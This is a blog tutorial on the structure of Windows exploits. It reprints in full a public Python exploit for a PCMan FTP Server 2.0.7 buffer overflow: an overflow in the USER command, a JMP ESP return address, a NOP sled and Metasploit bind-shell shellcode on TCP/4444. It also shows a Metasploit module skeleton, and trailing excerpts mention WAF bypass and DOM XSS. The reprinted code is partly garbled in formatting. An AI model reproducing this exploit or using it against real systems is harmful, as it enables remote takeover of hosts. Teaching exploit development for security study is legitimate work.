Skip to main content

Exploit Development Windows Part - 3

Basic Skeleton  of an Exploit

 Introduction

   In this module, we will be focusing on and discussing the exploit skeleton of exploits, how they are written and the basic parameters of exploits.
Knowledge Base

    Let’s first present the basic terminologies and concepts you need to know before we jump into explaining the core of exploit writing.

Shellcode or Payload

     There is no difference between shellcode and payload. However, let us quickly clear the confusion usually faced by newcomers in differentiating shellcode and payload.

    When you exploit the software and want something to do after exploitation, you write a piece of code, i.e. a shellcode, and when you execute this code while exploiting with your written exploit, i.e. a payload.

Vulnerability

     A weakness in the software application, which can be due to many reasons. Software misconfiguration, missing patch, zero-days or could be any other reason.

Zero-day

     Zero-day is a newly discovered vulnerability by hackers or crackers for which there is no patch or fix available or released by the vendor.

      The other key topic includes “how you control the execution flow of the vulnerable software” and this will be covered in the other modules of this workshop. Here we will be focused on the overall architecture of the exploit itself.

The Example Code

Manual Exploit Coding

Let’s first look at the exploit written for the PCMan’s FTP Server 2.0.7 – Buffer Overflow available at http://www.exploit-db.com/exploits/26471/. You can easily download this available exploit on the above link. This exploit is written in python language and the number of lines written are 129.

Let’s grab the code and have a quick look.

#!/usr/bin/env python

import signal

from time import sleep

from socket import *

from sys import exit, exc_info

#

# Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit – USER Command

# Discovered and Reported******June 2013

# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators

# Exploit/Advisory*************http://infosec42.blogspot.com/

# Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)

# Tested Commands*************USER (Other commands were not tested and may be vulnerable)

# CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending

#

    def sigHandle(signum, frm): # Signal handler

             print “\n[!!!] Cleaning up the exploit... [!!!]\n”

             sleep(1)

             exit(0)

        def targServer():

          while True:

          try:

                server = inet_aton(raw_input(“\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>”))

             server = inet_ntoa(server)

             break

   except:

          print “\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n”

          sleep(1)

          continue

return server


    def main():

            print (“””\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root

Shell Exploit – USER Command

[*] Discovered and Reported******June 2013

[*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators

[*] Exploit/Advisory*************http://infosec42.blogspot.com/

[*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)

[*] Tested Commands*************USER (Other commands were not tested and may be vulnerable)

[*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending”””)

    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c

    victim = targServer()
    port = int(21)

    Cmd = “USER “ #Vulnerable command

     JuNk = “\x42” * 2004

    # KERNEL32.dll 7CA58265 – JMP ESP

    ret = “\x65\x82\xA5\x7C”

    NOP = “\x90” * 50


#348 Bytes Bind Shell Port TCP/4444

#msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |

#msfencode -e x86/shikata_ga_nai -c 1 -b “\x0d\x0a\x00\xf1” R

shellcode = “\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9”

shellcode += “\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46”

shellcode += “\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84”

shellcode += “\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8”

shellcode += “\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08” 

shellcode += “\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27”

shellcode += “\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24”

shellcode += “\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80”

shellcode += “\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98”

shellcode += “\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7”

shellcode += “\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0”

shellcode += “\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82”

shellcode += “\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0”

shellcode += “\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6”

shellcode += “\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d”

shellcode += “\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32”

shellcode += “\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90”

shellcode += “\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5”

shellcode += “\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71”

shellcode += “\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2”

shellcode += “\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f”

shellcode += “\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14”

shellcode += “\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec”

shellcode += “\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88”

shellcode += “\x0c\x3f\x1c\x05\x6f\x16\x22\x79” 


sploit = Cmd + JuNk + ret + NOP + shellcode

sploit += “\x42” * (2992len(NOP + shellcode)) + “\r\n”
try:

       print “\n [*] Creating network socket.”

       net_sock = socket(AF_INET, SOCK_STREAM)

    except:

     print “\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n”
% exc_info()
 
                sleep(1)
 
                exit(0)
 
        try:

    print “ [*] Connecting to PCMan FTP Server @ %s on port TCP/%d.” % (victim, port) net_sock.connect((victim, port))

    except:
 
     print “\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n” % (victim,
exc_info())
 
     sleep(1)

     exit(0) 

    try:

        print “”” [*] Attempting to exploit the FTP USER command.

[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.

[*] Payload Length: %d bytes.””” %
(victim, port, len(sploit))

         net_sock.send(sploit)

         sleep(1)

  except:

         print\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n” % (victim, exc_info())

         sleep(1)

         exit(0)
 
    try:

            print “”” [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code
execution!

  [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n”””

net_sock.close()

   except:

        print “\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n”

     % exc_info()

                   sleep(1)

                   exit(0)

  if __name__ == “__main__”:
       main( )

     Well this is the whole junk of code, which is written to simply bind a TCP port on the victim machine and even the shellcode is also taken from the Metasploit.

However, let’s just focus on understanding the key architecture of this exploit.

    This includes two user defined functions and one main function and a couple of exception handlings. Initializations include the TCP information including target address and port with the vulnerable FTP command “USER”.

    The whole exploit code looks like scattered pieces of computer program, which it isn’t, it gives discipline information.

Let’s have a look at another exploit written in Ruby language.

Metasploit Exploits Skeleton

class Metasploit3 < Msf::Exploit::Remote

           include Msf::Exploit::Remote::TCP

          def initialize

                super(

                        ‘Name’ => ‘Simplified Exploit Module’,
                        ‘Description’ => ‘This module sends a payload’,
                        ‘Author’ => ‘My Name Here’,
                        ‘Payload’ => {‘Space’ => 1024, ‘BadChars’ => “\x00”},
                        ‘Targets’ => [ [‘Automatic’, {} ] ],
                        ‘Platform’ => ‘win’,
   )

   register_options( [
   Opt::RPORT(12345)
 ], self.class)

end
# Connect to port, send the payload, handle it, disconnect
def exploit

        connect()
        sock.put(payload.encoded)
        handler()
        disconnect()
      end
end

Benefits of Automation in Exploit Development

   In comparison of the manual methods for discovering the vulnerabilities and coding the exploit with the use of automated exploit development tools, there are many benefits you can have while using the exploit development tools.
• Less time in discovering the vulnerabilities
• Automation
• Reliability
• Re-use of code
• More options for payload

Core Architecture of Metasploit Exploit Module

   In the field of exploit development, there is no such standard that can explain the exploit development in a standard way. However, the best way to start the exploit development is plugging in the evergreen exploit development platform “Metasploit Framework”. Metasploit framework is written in the Ruby language, which gives you the power and freedom to develop both local and remote exploits in less time and with flexibility.

Exploit structure in Metasploit is divided into the two following sections.

• Initialization
• Exploit

   The exploit module starts with including the MSF core and other required libraries into the script, along with the declaration of a class, which extends the properties relevant to the exploit.
Initialization

  The initialization section of the exploit modules covers the pre-requirements of the exploitations where it initializes the exploits with the necessary data and some information useful for penetration testers at the time of exploit use.



   You can see that initialization of the modules includes the License, Author, version and the vulnerability references along with the Payload information required for the exploit.

   The most useful feature it provides is the Payload info parameters, such as “BadChars”, “Space” and “StackAdjustment”.
Exploit 

    The exploit section of the Metasploit Module simply executes the initialized information with the set functions and the respective method of interacting with the target machine.



    In this way, you can have a structured and pluggable exploit written. Metasploit exploit development unloads most of the work to the framework so that your exploit can be a small piece of code, efficient and effective.

Summary

     Metasploit exploit development provides the faster, easier and efficient exploit development with the available resources and functionalities pre-built into the Metasploit Framework. One of the key benefits you can use is, if you have enough space for the shellcode, the most famous and effective shellcode “the meterpreter” as payload in your exploit, hence you don’t need to waste your time in coding new shellcode or looking around on the internet.


Popular posts from this blog

Bypassing Web Application Firewall Part - 2

WAF Bypassing with SQL Injection HTTP Parameter Pollution & Encoding Techniques HTTP Parameter Pollution is an attack where we have the ability to override or add HTTP GET/POST parameters by injecting string delimiters. HPP can be distinguished in two categories, client-side and server-side, and the exploitation of HPP can result in the following outcomes:  •Override existing hardcoded HTTP parameters  •Modify the application behaviors   •Access and potentially exploit uncontrollable variables  • Bypass input validation checkpoints and WAF rules HTTP Parameter Pollution – HPP   WAFs, which is the topic of interest, many times perform query string parsing before applying the filters to this string. This may result in the execution of a payload that an HTTP request can carry. Some WAFs analyze only one parameter from the string of the request, most of the times the first or the last, which may result in a bypass of the WAF filters, and execution of the payload in the server.  Let’s e

Haking On Demand_WireShark - Part 5

Detect/Analyze Scanning Traffic Using Wireshark “Wireshark”, the world’s most popular Network Protocol Analyzer is a multipurpose tool. It can be used as a Packet Sniffer, Network Analyser, Protocol Analyser & Forensic tool. Through this article my focus is on how to use Wireshark to detect/analyze any scanning & suspect traffic. Let’s start with Scanning first. As a thief studies surroundings before stealing something from a target, similarly attackers or hackers also perform foot printing and scanning before the actual attack. In this phase, they want to collect all possible information about the target so that they can plan their attack accordingly. If we talk about scanning here they want to collect details like: • Which IP addresses are in use? • Which port/services are active on those IPs? • Which platform (Operating System) is in use? • What are the vulnerabilities & other similar kinds of information. • Now moving to some popular scan methods and ho

Bypassing Web Application Firewall Part - 4

Securing WAF and Conclusion DOM Based XSS DOM based XSS is another type of XSS that is also used widely, and we didn’t discuss it in module 3. The DOM, or Document Object Model, is the structural format used to represent documents in a browser. The DOM enables dynamic scripts such as JavaScript to reference components of the document such as a form field or a session cookie, and it is also a security feature that limits scripts on different domains from obtaining cookies for other domains. Now, the XSS attacks based on this is when the payload that we inject is executed as a result of modifying the DOM environment in the victim’s browser, so that the code runs in an unexpected way. By this we mean that in contrast with the other two attacks, here the page that the victim sees does not change, but the injected code is executed differently because of the modifications that have been done in the DOM environment, that we said earlier. In the other XSS attacks, we saw the injected code was